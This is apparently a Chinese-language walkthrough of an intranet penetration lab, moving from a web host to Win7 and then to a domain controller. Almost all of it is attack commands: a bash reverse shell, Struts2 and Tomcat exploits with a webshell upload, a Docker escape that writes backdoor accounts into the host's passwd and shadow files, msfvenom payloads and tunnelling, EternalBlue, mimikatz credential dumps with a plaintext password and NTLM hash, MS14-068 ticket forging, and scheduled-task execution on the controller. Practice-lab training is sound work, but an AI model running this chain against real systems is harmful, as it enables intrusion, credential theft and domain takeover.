环境配置

靶机链接：百度网盘 请输入提取码

提取码：fk2z

WEB 192.168.111.132 192.168.54.133

WIN7 192.168.54.130

DC 192.168.54.132

网卡配置：

web靶机配置：

启动docker服务：

sudo docker start ec 17 09 bb da 3d ab ad

sudo docker ps

web渗透

1.探测web靶机开放端口和服务情况

nmap -p- -A -sV 192.168.111.132

2.查看2001端口,是一个struts2

3.查看2002端口是一个tomcat

4.2003端口是一个phpmyadmin界面

5.探测漏洞，似乎有cve-2017-5638

nikto -host http://192.168.111.132:2001

6.利用struts2工具进行探测，确实存在漏洞。

7.可以执行命令

8.进行反弹shell操作

bash -i >& /dev/tcp/192.168.111.129/8888 0>&1

9.进去之后虽然是root权限但是它是一个docker容器的权限！

docker容器判断方法：

1>判断根目录下 .dockerenv文件

2>查询系统进程的cgroup信息

ls -alh /.dockerenv

cat /proc/1/cgroup

Tomcat漏洞

1.2002端口存在Tomcat cve-2017-12615漏洞

把get请求改为post 上传冰蝎马

2.成功连接冰蝎，并且是Root权限

3.kali开启监听，进行反弹shell操作

利用特权模式进行 docker 逃逸

1.SHELL=bash script -q /dev/null //反弹交互式shell

fdisk -l //查看磁盘文件

cd /tmp

mkdir hak //创建目录以备挂载

mount /dev/sda1 hak //将宿主机/dev/sda1 目录挂载至容器内

cat hak/etc/passwd //可任意读取文件

2.写入特权账号，密码为ubuntu

echo "hak:x:0:0::/home/wanli:/bin/bash" >> hak/etc/passwd

echo "hak:\$1\$xJbww\$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::" >>hak/etc/shadow

3.写入的root权限用户无法登录ssh,写入普通用户,成功登录。

echo "wei:x:1001:1001:jack,,,:/home/jack:/bin/bash" >> hak/etc/passwd

echo "wei:\$1\$xJbww\$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::" >> hak/etc/shadow

横向渗透

1.本地开启http服务，将fscan下载到靶机里；

wget http://192.168.111.129:8000/fscan_amd64

./fscan -h 192.168.54.0/24 //开始扫描

2.生成木马，反弹到msf里进行渗透

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=8888 -f elf > shell.elf

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.111.129

set lport 8888

run

3.代理选择ew或者frp,不建议msf自带的代理。

ew代理

在kali上执行命令

./ew_for_linux64 -s rcsocks -l 1188 -e 1234

在目标主机上上传ew_for_linux64

执行命令

./ew_for_linux64 -s rssocks -d 192.168.111.129 -e 1234

4.用代理启动msf ，利用永恒之蓝漏洞攻击win7

5.设置正向连接payload,多run几次才能拿到shell

set payload windows/x64/meterpreter/bind_tcp

win7渗透

1.load kiwi 加载猕猴桃

2.creds_all 列举所有凭据 ,列举系统中的明文密码

Username：douser PASSWORD：Dotest123

Domain：DEMO.COM

NTLM：bc23b0b4d5bf5ff42bc61fb62e13886e

SID：S-1-5-21-979886063-1111900045-1414766810-1107

3.因为靶机作者已经把利用工具已放到了桌面，切换到桌面目录，可以直接利用。

cd C:\Users\douser\Desktop

4.生成高权限票据

MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.54.132 -p Dotest123

5.利用mimikatz导入票据

kerberos::purge //清空票据

kerberos::ptc TGT_douser@DEMO.COM.ccache //将票据注入到内存中

kerberos::list //查看票据

6.成功访问域控

dir \\计算机机器名字\c$

dir \\WIN-ENS2VR5TR3N\c$

7.生成正向木马，写入域控进行弹shell

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.52.131 LPORT=7777 -f exe > 7777.exe

8.把本地生成的木马，上传到win7的c盘，然后复制到域控的c盘

upload /home/kali/Desktop/7777.exe C:\

copy C:\\7777.exe \\WIN-ENS2VR5TR3N\c$

9.创建计划任务，执行木马

schtasks /create /S WIN-ENS2VR5TR3N /tn yukong /sc onstart /tr c:\7777.exe /ru system /f

schtasks /run /s 192.168.52.132 /i /tn "yukong"

失败！！